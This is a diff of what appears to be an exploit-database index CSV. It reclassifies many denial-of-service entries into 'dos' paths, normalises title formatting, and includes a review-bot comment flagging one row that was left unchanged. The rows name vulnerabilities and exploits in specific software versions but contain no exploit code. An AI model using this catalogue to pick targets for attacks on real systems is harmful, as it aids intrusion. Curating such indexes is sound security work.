 30686,platforms/php/webapps/30686.txt,"SiteBar <= 3.3.8 command.php Modify User Action uid Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
 30804,platforms/php/webapps/30804.txt,"VBTube 1.1 - Search Cross-Site Scripting Vulnerability",2007-11-24,Crackers_Child,php,webapps,0
 30805,platforms/windows/dos/30805.html,"RichFX Basic Player 1.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-25,"Elazar Broad",windows,dos,0
-30688,platforms/hardware/webapps/30688.py,"Motorola SBG6580 Cable Modem & Wireless Router - DoS Reboot",2014-01-04,nicx0,hardware,webapps,0
+30688,platforms/hardware/dos/30688.py,"Motorola SBG6580 Cable Modem & Wireless Router - DoS Reboot",2014-01-04,nicx0,hardware,dos,0
 30689,platforms/php/webapps/30689.php,"Taboada Macronews <= 1.0 - SQLi Exploit",2014-01-04,Jefrey,php,webapps,0
 31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0
 31028,platforms/php/webapps/31028.txt,"Article Dashboard 'admin/login.php' Multiple SQL Injection Vulnerabilities",2008-01-15,Xcross87,php,webapps,0
@@ -27696,7 +27696,7 @@ id,file,description,date,author,platform,type,port
 30741,platforms/php/webapps/30741.txt,"easyGB 2.1.1 Index.PHP Local File Include Vulnerability",2007-11-05,"BorN To K!LL",php,webapps,0
 30742,platforms/multiple/remote/30742.txt,"OpenBase 10.0.x - Buffer Overflow Vulnerability and Multiple Remote Command Execution Vulnerabilities",2007-11-05,"Kevin Finisterre",multiple,remote,0
 30743,platforms/asp/webapps/30743.txt,"i-Gallery 3.4 igallery.ASP Remote Information Disclosure Vulnerability",2007-11-05,hackerbinhphuoc,asp,webapps,0
-30744,platforms/linux/remote/30744.txt,"MySQL <= 5.1.23 Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability",2007-11-05,"Joe Gallo",linux,remote,0
+30744,platforms/linux/dos/30744.txt,"MySQL <= 5.1.23 - Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability",2007-11-05,"Joe Gallo",linux,dos,0
 30745,platforms/php/webapps/30745.html,"Weblord.it MS-TopSites Unauthorized Access Vulnerability and HTML Injection Vulnerability",2007-11-06,0x90,php,webapps,0
 30746,platforms/php/webapps/30746.txt,"Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross-Site Scripting Vulnerability",2007-11-07,"Giuseppe Gottardi",php,webapps,0
 30747,platforms/asp/webapps/30747.txt,"Rapid Classified AgencyCatResult.ASP SQL Injection Vulnerability",2007-11-08,The-0utl4w,asp,webapps,0
@@ -27705,10 +27705,10 @@ id,file,description,date,author,platform,type,port
 30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 Modules.PHP SQL Injection Vulnerability",2007-11-12,0x90,php,webapps,0
 30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 Login.PHP Cross-Site Scripting Vulnerability",2007-11-12,"Hanno Boeck",php,webapps,0
 30752,platforms/php/webapps/30752.txt,"Eggblog 3.1 Rss.PHP Cross-Site Scripting Vulnerability",2007-11-12,"Mesut Timur",php,webapps,0
-30753,platforms/php/webapps/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 Index.PHP Denial of Service Vulnerability",2007-11-12,L4teral,php,webapps,0
+30753,platforms/php/dos/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 - Index.PHP Denial of Service Vulnerability",2007-11-12,L4teral,php,dos,0
 30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 PHP_SELF Index.PHP Cross-Site Scripting Vulnerability",2007-08-27,L4teral,php,webapps,0
 30755,platforms/hardware/remote/30755.txt,"F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 - Cross-Site Scripting Vulnerability",2007-11-12,"Jan Fry",hardware,remote,0
-30756,platforms/windows/remote/30756.html,"Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities",2007-11-12,"Elazar Broad",windows,remote,0
+30756,platforms/windows/dos/30756.html,"Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities",2007-11-12,"Elazar Broad",windows,dos,0
 30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 sources/frame.php room Parameter XSS",2007-11-12,ShAy6oOoN,php,webapps,0
 30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 upgradev1.php INSTALL_X7CHATVERSION Parameter XSS",2007-11-12,ShAy6oOoN,php,webapps,0
 30759,platforms/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 - Searchtype Parameter Cross-Site Scripting Vulnerability",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps,0
@@ -27809,7 +27809,7 @@ id,file,description,date,author,platform,type,port
 30892,platforms/php/webapps/30892.txt,"Neuron News 1.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps,0
 30893,platforms/php/webapps/30893.txt,"PHP Security Framework Multiple Input Validation Vulnerabilities",2007-12-17,DarkFig,php,webapps,0
 30894,platforms/linux/dos/30894.txt,"PeerCast 0.12 HandshakeHTTP Multiple Buffer Overflow Vulnerabilities",2007-12-17,"Luigi Auriemma",linux,dos,0
-30895,platforms/linux/remote/30895.pl,"Perl Net::DNS 0.48/0.59/0.60 DNS Response Remote Denial of Service Vulnerability",2007-12-17,beSTORM,linux,remote,0
+30895,platforms/linux/dos/30895.pl,"Perl Net::DNS 0.48/0.59/0.60 - DNS Response Remote Denial of Service Vulnerability",2007-12-17,beSTORM,linux,dos,0
 30896,platforms/multiple/dos/30896.txt,"Appian Business Process Management Suite 5.6 - Remote Denial of Service Vulnerability",2007-12-17,"Chris Castaldo",multiple,dos,0
 30897,platforms/windows/remote/30897.html,"iMesh 7 - 'IMWebControl' ActiveX Control Code Execution Vulnerability",2007-12-17,rgod,windows,remote,0
 30898,platforms/linux/dos/30898.pl,"Common UNIX Printing System 1.2/1.3 SNMP 'asn1_get_string()' Remote Buffer Overflow Vulnerability",2007-11-06,wei_wang,linux,dos,0
@@ -27917,7 +27917,7 @@ id,file,description,date,author,platform,type,port
 31013,platforms/hardware/remote/31013.txt,"2Wire Routers - Cross-Site Request Forgery Vulnerability",2008-01-15,hkm,hardware,remote,0
 31014,platforms/windows/dos/31014.py,"haneWIN DNS Server 1.5.3 - Denial of Service",2014-01-17,sajith,windows,dos,53
 31015,platforms/php/webapps/31015.txt,"bloofox CMS 0.5.0 - Multiple Vulnerabilities",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,80
-31017,platforms/asp/webapps/31017.php,"SmarterMail Enterprise and Standard <=11.x - Stored XSS",2014-01-17,"Saeed reza Zamanian",asp,webapps,80
+31017,platforms/asp/webapps/31017.php,"SmarterMail Enterprise and Standard <= 11.x - Stored XSS",2014-01-17,"Saeed reza Zamanian",asp,webapps,80
 31018,platforms/linux/dos/31018.txt,"GStreamer 0.10.15 - Multiple Unspecified Remote Denial of Service Vulnerabilities",2008-01-11,"Sam Hocevar",linux,dos,0
 31020,platforms/php/webapps/31020.txt,"Moodle <= 1.8.3 - 'install.php' Cross-Site Scripting Vulnerability",2008-01-12,"Hanno Bock",php,webapps,0
 31021,platforms/osx/dos/31021.html,"Apple Safari <= 2.0.4 KHTML WebKit Remote Denial of Service Vulnerability",2008-01-12,"David Barroso",osx,dos,0
@@ -29188,7 +29188,7 @@ id,file,description,date,author,platform,type,port
 32359,platforms/php/remote/32359.txt,"SePortal 2.5 - SQL Injection Vulnerabilty",2014-03-19,jsass,php,remote,0
 32360,platforms/php/webapps/32360.txt,"Nooms 1.1 - smileys.php page_id Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0
 32361,platforms/php/webapps/32361.txt,"Nooms 1.1 - search.php q Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0
-32362,platforms/multiple/remote/32362.txt,"Unreal Engine 3 - Failed Memory Allocation Remote Denial of Service Vulnerability",2008-09-12,"Luigi Auriemma",multiple,remote,0
+32362,platforms/multiple/dos/32362.txt,"Unreal Engine 3 - Failed Memory Allocation Remote Denial of Service Vulnerability",2008-09-12,"Luigi Auriemma",multiple,dos,0
 32363,platforms/multiple/remote/32363.txt,"Epic Games Unreal Engine 436 - Multiple Format String Vulnerabilities",2008-09-11,"Luigi Auriemma",multiple,remote,0
 32364,platforms/php/webapps/32364.txt,"Dynamic MP3 Lister 2.0.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0
 32365,platforms/php/webapps/32365.txt,"Paranews 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0
@@ -29438,7 +29438,7 @@ id,file,description,date,author,platform,type,port
 32654,platforms/windows/remote/32654.txt,"Microsoft Internet Explorer 8 - CSS 'expression' Property Cross-Site Scripting Filter Bypass Weakness",2008-12-11,"Rafel Ivgi",windows,remote,0
 32655,platforms/jsp/webapps/32655.txt,"Multiple Ad Server Solutions Products 'logon_processing.jsp' SQL Injection Vulnerabilities",2008-12-11,"3d D3v!L",jsp,webapps,0
 32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 - Multiple SQL Injection Vulnerabilities",2008-12-01,"security curmudgeon",php,webapps,0
-32657,platforms/windows/remote/32657.py,"Nokia N70 and N73 Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,remote,0
+32657,platforms/windows/remote/32657.py,"Nokia N70 and N73 - Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,remote,0
 32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary 'cat' Parameter SQL Injection Vulnerability",2008-12-13,Pouya_Server,asp,webapps,0
 32763,platforms/windows/dos/32763.html,"Microsoft Internet Explorer 7.0 HTML Form Value Denial of Service Vulnerability",2009-01-28,"Juan Pablo Lopez Yacubian",windows,dos,0
 32660,platforms/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps,0
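Review bot: Row 32657 keeps `platforms/windows/remote/32657.py` and `type` `remote` on the new side even though its description reads "Remote Denial of Service Vulnerability", while every other row with that wording touched by this commit is moved to a `dos/` path with `type` `dos` (32688 in the next hunk and 30895 earlier, for example). If the reclassification is meant to be uniform this row looks like an omission and would become `32657,platforms/windows/dos/32657.py,"Nokia N70 and N73 - Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,dos,0`, with the file moved alongside it. If it was left in `remote` on purpose, a sentence in the commit message saying why would stop the next cleanup pass from re-raising it.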
@@ -29469,7 +29469,7 @@ id,file,description,date,author,platform,type,port
 32685,platforms/php/webapps/32685.txt,"ViArt Shop 3.5 manuals_search.php manuals_search Parameter XSS",2008-12-29,"Xia Shing Zee",php,webapps,0
 32686,platforms/multiple/remote/32686.xml,"MagpieRSS 0.72 CDATA HTML Injection Vulnerability",2008-12-29,system_meltdown,multiple,remote,0
 32687,platforms/asp/webapps/32687.txt,"Madrese-Portal 'haber.asp' SQL Injection Vulnerability",2008-12-29,"Sina Yazdanmehr",asp,webapps,0
-32688,platforms/windows/remote/32688.py,"Winace 2.2 Malformed Filename Remote Denial of Service Vulnerability",2008-12-29,cN4phux,windows,remote,0
+32688,platforms/windows/dos/32688.py,"Winace 2.2 - Malformed Filename Remote Denial of Service Vulnerability",2008-12-29,cN4phux,windows,dos,0
 32689,platforms/php/webapps/32689.txt,"NPDS < 08.06 - Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-François Leclerc",php,webapps,0
 32690,platforms/linux/remote/32690.txt,"xterm DECRQSS Remote Command Execution Vulnerability",2008-12-29,"Paul Szabo",linux,remote,0
 32691,platforms/linux/remote/32691.txt,"Audio File Library 0.2.6 - (libaudiofile) 'msadpcm.c' WAV File Processing Buffer Overflow Vulnerability",2008-12-30,"Anton Khirnov",linux,remote,0
@@ -29543,7 +29543,7 @@ id,file,description,date,author,platform,type,port
 32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek 'cs.html' URI Redirection Vulnerability",2009-01-28,buzzy,php,webapps,0
 32767,platforms/php/webapps/32767.txt,"QuickCMS 5.4 - Multiple Vulnerabilites",2014-04-09,"Shpend Kurtishaj",php,webapps,0
 32768,platforms/cgi/webapps/32768.pl,"PerlSoft Gästebuch 1.7b - 'admincenter.cgi' Remote Command Execution Vulnerability",2009-01-29,Perforin,cgi,webapps,0
-32769,platforms/php/remote/32769.php,"PHP 5.2.5 - 'mbstring.func_overload' Webserver Denial Of Service Vulnerability",2009-01-30,strategma,php,remote,0
+32769,platforms/php/dos/32769.php,"PHP 5.2.5 - 'mbstring.func_overload' Webserver Denial Of Service Vulnerability",2009-01-30,strategma,php,dos,0
 32770,platforms/php/webapps/32770.txt,"E-Php B2B Trading Marketplace Script Multiple Cross-Site Scripting Vulnerabilities",2009-01-30,SaiedHacker,php,webapps,0
 32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Local Privilege Escalation Vulnerability",2009-02-02,"Ruben Santamarta ",windows,local,0
 32772,platforms/windows/dos/32772.py,"Nokia Multimedia Player 1.1 - (.m3u) Heap Buffer Overflow Vulnerability",2009-02-03,zer0in,windows,dos,0
@@ -30366,7 +30366,7 @@ id,file,description,date,author,platform,type,port
 33689,platforms/multiple/remote/33689.as,"Adobe Flash Player <= 10.1.51 - Local File Access Information Disclosure Vulnerability",2010-03-03,"lis cker",multiple,remote,0
 33690,platforms/php/webapps/33690.txt,"DosyaYukle Scripti 1.0 - Remote File Upload Vulnerability",2010-03-03,indoushka,php,webapps,0
 33691,platforms/jsp/webapps/33691.txt,"Comptel Provisioning and Activation 'error_msg_parameter' Cross-Site Scripting Vulnerability",2010-03-04,thebluegenius,jsp,webapps,0
-33707,platforms/windows/remote/33707.txt,"Orb Networks <= 2.54.18 - Orb Direct Show Filter MP3 File Divide-By-Zero Denial of Service Vulnerability",2010-03-04,"Matthew Bergin",windows,remote,0
+33707,platforms/windows/dos/33707.txt,"Orb Networks <= 2.54.18 - Orb Direct Show Filter MP3 File Divide-By-Zero Denial of Service Vulnerability",2010-03-04,"Matthew Bergin",windows,dos,0
 33708,platforms/bsd/dos/33708.c,"FreeBSD <= 8.0 and OpenBSD 4.x - 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability",2010-03-05,kingcope,bsd,dos,0
 33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0
 33706,platforms/php/webapps/33706.txt,"Drupal < 6.16 and 5.22 - Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0
@@ -30401,7 +30401,7 @@ id,file,description,date,author,platform,type,port
 33734,platforms/php/webapps/33734.txt,"DDL CMS 2.1 - 'blacklist.php' Cross-Site Scripting Vulnerability",2010-03-10,ITSecTeam,php,webapps,0
 33735,platforms/multiple/dos/33735.txt,"SUPERAntiSpyware 4.34.1000 and SuperAdBlocker 4.6.1000 - Multiple Vulnerabilities",2010-03-10,"Luka Milkovic",multiple,dos,0
 33736,platforms/aix/webapps/33736.php,"Plesk 10.4.4/11.0.9 - SSO XXE/XSS Injection Exploit",2014-06-13,"BLacK ZeRo",aix,webapps,0
-33737,platforms/hardware/remote/33737.py,"ZTE and TP-Link RomPager - DoS Exploit",2014-06-13,"Osanda Malith",hardware,remote,0
+33737,platforms/hardware/dos/33737.py,"ZTE and TP-Link RomPager - DoS Exploit",2014-06-13,"Osanda Malith",hardware,dos,0
 33760,platforms/multiple/webapps/33760.txt,"Multiple Products 'banner.swf' Cross-Site Scripting Vulnerability",2010-03-15,MustLive,multiple,webapps,0
 33761,platforms/asp/webapps/33761.txt,"Pars CMS 'RP' Parameter Multiple SQL Injection Vulnerabilities",2010-03-15,Isfahan,asp,webapps,0
 33739,platforms/hardware/remote/33739.txt,"Yealink VoIP Phone SIP-T38G - Default Credentials",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
@@ -30497,7 +30497,7 @@ id,file,description,date,author,platform,type,port
 33836,platforms/windows/shellcode/33836.txt,"Windows All Versions - Add Admin User Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0
 33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 - 'jtfwcpnt.jsp' SQL Injection Vulnerability",2010-04-15,"Joxean Koret",multiple,remote,0
 33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0
-33841,platforms/windows/remote/33841.txt,"HTTP File Server 2.2 Security Bypass and Denial of Service Vulnerabilities",2010-04-19,"Luigi Auriemma",windows,remote,0
+33841,platforms/windows/remote/33841.txt,"HTTP File Server 2.2 - Security Bypass and Denial of Service Vulnerabilities",2010-04-19,"Luigi Auriemma",windows,remote,0
 33880,platforms/windows/remote/33880.rb,"Cogent DataHub Command Injection",2014-06-25,metasploit,windows,remote,0
 33857,platforms/php/webapps/33857.txt,"e107 0.7.x - 'e107_admin/banner.php' SQL Injection Vulnerability",2010-04-21,"High-Tech Bridge SA",php,webapps,0
 33997,platforms/php/webapps/33997.txt,"NPDS Revolution 10.02 - 'download.php' Cross-Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0
@@ -30789,7 +30789,7 @@ id,file,description,date,author,platform,type,port
 34169,platforms/php/webapps/34169.txt,"Moodle 2.7 - Persistent XSS",2014-07-27,"Osanda Malith",php,webapps,0
 34170,platforms/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting Vulnerability",2014-07-27,"Mayuresh Dani",php,webapps,0
 34363,platforms/multiple/remote/34363.rb,"Firefox toString console.time Privileged Javascript Injection",2014-08-19,metasploit,multiple,remote,0
-34172,platforms/hardware/webapps/34172.txt,"Sagem Fast 3304-V1 - Denial Of Service Vulnerability",2014-07-27,Z3ro0ne,hardware,webapps,0
+34172,platforms/hardware/dos/34172.txt,"Sagem Fast 3304-V1 - Denial Of Service Vulnerability",2014-07-27,Z3ro0ne,hardware,dos,0
 34173,platforms/php/webapps/34173.txt,"DirPHP 1.0 - LFI Vulnerability",2014-07-27,"black hat",php,webapps,0
 34174,platforms/windows/remote/34174.txt,"Enemy Territory: Quake Wars 1.5.12642.33243 - Buffer Overflow Vulnerability",2010-08-18,"Luigi Auriemma",windows,remote,0
 34175,platforms/php/webapps/34175.txt,"SaffaTunes CMS 'news.php' Multiple SQL Injection Vulnerabilities",2010-06-21,"Th3 RDX",php,webapps,0
@@ -30815,7 +30815,7 @@ id,file,description,date,author,platform,type,port
 34198,platforms/php/webapps/34198.txt,"Limny 2.1 - 'q' Parameter Cross-Site Scripting Vulnerability",2010-06-24,"High-Tech Bridge SA",php,webapps,0
 34200,platforms/hardware/remote/34200.txt,"Cisco Adaptive Security Response HTTP Response Splitting Vulnerability",2010-06-25,"Daniel King",hardware,remote,0
 34201,platforms/linux/remote/34201.txt,"feh <= 1.7 - '--wget-timestamp' Remote Code Execution Vulnerability",2010-06-25,anonymous,linux,remote,0
-34203,platforms/hardware/webapps/34203.txt,"Dlink DWR-113 Rev. Ax - CSRF Denial of Service",2014-07-30,"Blessen Thomas",hardware,webapps,0
+34203,platforms/hardware/dos/34203.txt,"Dlink DWR-113 Rev. Ax - CSRF Denial of Service",2014-07-30,"Blessen Thomas",hardware,dos,0
 34204,platforms/php/webapps/34204.html,"SkaDate Lite 2.0 - Multiple CSRF And Persistent XSS Vulnerabilities",2014-07-30,LiquidWorm,php,webapps,80
 34205,platforms/php/webapps/34205.py,"SkaDate Lite 2.0 - Remote Code Execution Exploit",2014-07-30,LiquidWorm,php,webapps,80
 34206,platforms/hardware/webapps/34206.txt,"D-Link AP 3200 - Multiple Vulnerabilities",2014-07-30,pws,hardware,webapps,80
@@ -30837,7 +30837,7 @@ id,file,description,date,author,platform,type,port
 34222,platforms/php/webapps/34222.html,"Grafik CMS 'admin.php' SQL Injection and Cross-Site Scripting Vulnerabilities",2010-06-29,"High-Tech Bridge SA",php,webapps,0
 34223,platforms/cgi/webapps/34223.txt,"Miyabi CGI Tools 1.02 \'index.pl\' Remote Command Execution Vulnerability",2010-06-29,"Marshall Whittaker",cgi,webapps,0
 34224,platforms/multiple/webapps/34224.txt,"Kryn.cms 6.0 - Cross-Site Request Forgery and HTML Injection Vulnerabilities",2010-06-29,TurboBorland,multiple,webapps,0
-34225,platforms/php/webapps/34225.txt,"TornadoStore 1.4.3 SQL Injection and HTML Injection Vulnerabilities",2010-06-29,"Lucas Apa",php,webapps,0
+34225,platforms/php/webapps/34225.txt,"TornadoStore 1.4.3 - SQL Injection and HTML Injection Vulnerabilities",2010-06-29,"Lucas Apa",php,webapps,0
 34226,platforms/php/webapps/34226.txt,"System CMS Contentia 'news.php' SQL Injection Vulnerability",2010-06-30,GlaDiaT0R,php,webapps,0
 34227,platforms/windows/dos/34227.txt,"Qt <= 4.6.3 - Remote Denial of Service Vulnerability",2010-06-29,"Luigi Auriemma",windows,dos,0
 34228,platforms/linux/dos/34228.txt,"Mumble Murmur 1.2 - Denial of Service Vulnerability",2010-06-29,"Luigi Auriemma",linux,dos,0
@@ -31089,7 +31089,7 @@ id,file,description,date,author,platform,type,port
 34502,platforms/windows/dos/34502.py,"Serveez 0.1.7 - 'If-Modified-Since' Header Stack Buffer Overflow Vulnerability",2009-08-09,"lvac lvac",windows,dos,0
 34503,platforms/php/webapps/34503.txt,"Syntax Highlighter 3.0.83 - 'index.html' HTML Injection Vulnerability",2010-08-19,indoushka,php,webapps,0
 34504,platforms/php/webapps/34504.txt,"Cacti <= 0.8.7 on Red Hat High Performance Computing (HPC) utilities.php filter Parameter XSS",2010-08-19,"Marc Schoenefeld",php,webapps,0
-34505,platforms/php/webapps/34505.txt,"MySQL <= 5.1.48 - 'TEMPORARY InnoDB' Tables Denial Of Service Vulnerability",2010-08-19,"Boris Reisig",php,webapps,0
+34505,platforms/php/dos/34505.txt,"MySQL <= 5.1.48 - 'TEMPORARY InnoDB' Tables Denial Of Service Vulnerability",2010-08-19,"Boris Reisig",php,dos,0
 34506,platforms/linux/dos/34506.txt,"MySQL <= 5.1.48 - 'EXPLAIN' Denial Of Service Vulnerability",2010-08-20,"Bjorn Munch",linux,dos,0
 34507,platforms/linux/remote/34507.txt,"Nagios XI 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",linux,remote,0
 34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 - 'register/next' SQL Injection Vulnerability",2010-08-23,Sweet,php,webapps,0
@@ -31679,7 +31679,7 @@ id,file,description,date,author,platform,type,port
 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
 35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) _Patch_ DLM Vulnerability",2014-11-03,metasploit,hardware,remote,9100
 35153,platforms/osx/dos/35153.c,"Mac OS X Mavericks IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0
-35154,platforms/asp/webapps/35154.txt,"Sigma Portal 'ShowObjectPicture.aspx' Denial of Service Vulnerability",2010-12-27,"Pouya Daneshmand",asp,webapps,0
+35154,platforms/asp/dos/35154.txt,"Sigma Portal - 'ShowObjectPicture.aspx' Denial of Service Vulnerability",2010-12-27,"Pouya Daneshmand",asp,dos,0
 35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0
 35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0
 35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 - searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0
@@ -31842,13 +31842,13 @@ id,file,description,date,author,platform,type,port
 35336,platforms/php/webapps/35336.txt,"TaskFreak 0.6.4 index.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0
 35337,platforms/php/webapps/35337.txt,"TaskFreak 0.6.4 print_list.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0
 35338,platforms/php/webapps/35338.txt,"TaskFreak 0.6.4 rss.php HTTP Referer Header XSS",2011-02-12,LiquidWorm,php,webapps,0
-35339,platforms/multiple/remote/35339.txt,"JourneyMap 5.0.0RC2 Ultimate Edition - DoS (Resource Consumption)",2014-11-24,CovertCodes,multiple,remote,0
+35339,platforms/multiple/dos/35339.txt,"JourneyMap 5.0.0RC2 Ultimate Edition - DoS (Resource Consumption)",2014-11-24,CovertCodes,multiple,dos,0
 35340,platforms/php/webapps/35340.txt,"Wordpress wpDataTables Plugin 1.5.3 - SQL Injection Vulnerability",2014-11-24,"Claudio Viviani",php,webapps,0
 35341,platforms/php/webapps/35341.py,"Wordpress wpDataTables Plugin 1.5.3 - Unauthenticated Shell Upload Vulnerability",2014-11-24,"Claudio Viviani",php,webapps,0
 35342,platforms/aix/dos/35342.txt,"RobotStats 1.0 - HTML Injection Vulnerability",2014-11-24,"ZoRLu Bugrahan",aix,dos,0
 35343,platforms/php/webapps/35343.txt,"Smarty Template Engine <= 2.6.9 - '$smarty.template' PHP Code Injection Vulnerability",2011-02-09,jonieske,php,webapps,0
 35344,platforms/php/webapps/35344.txt,"RobotStats 1.0 - (robot param) SQL Injection Vulnerability",2014-11-24,"ZoRLu Bugrahan",php,webapps,0
-35345,platforms/hardware/webapps/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,webapps,0
+35345,platforms/hardware/dos/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,dos,0
 35346,platforms/php/webapps/35346.txt,"DukaPress 2.5.2 - Path Traversal",2014-11-24,"Kacper Szurek",php,webapps,0
 35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 - 'style' Parameter Cross-Site Scripting Vulnerability",2011-02-12,"AutoSec Tools",php,webapps,0
 35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0
@@ -31909,9 +31909,9 @@ id,file,description,date,author,platform,type,port
 35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Include Vulnerability",2011-03-04,"AutoSec Tools",windows,remote,0
 35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 Troubleshooting/DiagnosticReport.asp HeaderWarning Parameter XSS",2011-03-07,Dionach,asp,webapps,0
 35412,platforms/asp/webapps/35412.txt,"Kodak InSite 5.5.2 Pages/login.aspx Language Parameter XSS",2011-03-07,Dionach,asp,webapps,0
-35413,platforms/php/webapps/35413.php,"WordPress <=4.0 - Denial of Service Exploit",2014-12-01,SECURELI.com,php,webapps,80
-35414,platforms/php/webapps/35414.txt,"Wordpress < 4.0.1 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,webapps,80
-35415,platforms/php/webapps/35415.txt,"Drupal < 7.34 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,webapps,80
+35413,platforms/php/dos/35413.php,"WordPress <= 4.0 - Denial of Service Exploit",2014-12-01,SECURELI.com,php,dos,80
+35414,platforms/php/dos/35414.txt,"Wordpress < 4.0.1 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,dos,80
+35415,platforms/php/dos/35415.txt,"Drupal < 7.34 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,dos,80
 35416,platforms/php/webapps/35416.txt,"Interleave 5.5.0.2 - 'basicstats.php' Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0
 35417,platforms/php/webapps/35417.php,"WS Interactive Automne 4.1 - 'admin/upload-controler.php' Remote Arbitrary File Upload Vulnerability",2011-03-08,"AutoSec Tools",php,webapps,0
 35418,platforms/php/webapps/35418.txt,"Inline Gallery WordPress Plugin 0.3.9 - 'do' Parameter Cross-Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
@@ -31919,7 +31919,7 @@ id,file,description,date,author,platform,type,port
 35420,platforms/hardware/webapps/35420.txt,"IPUX Cube Type CS303C IP Camera - (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
 35421,platforms/hardware/webapps/35421.txt,"IPUX CL5452/CL5132 IP Camera - (UltraSVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
 35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
-35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <=13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0
+35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <= 13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0
 35424,platforms/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",php,webapps,0
 36125,platforms/php/webapps/36125.txt,"Piwigo 2.7.3 - SQL Injection",2015-02-19,"Sven Schleier",php,webapps,80
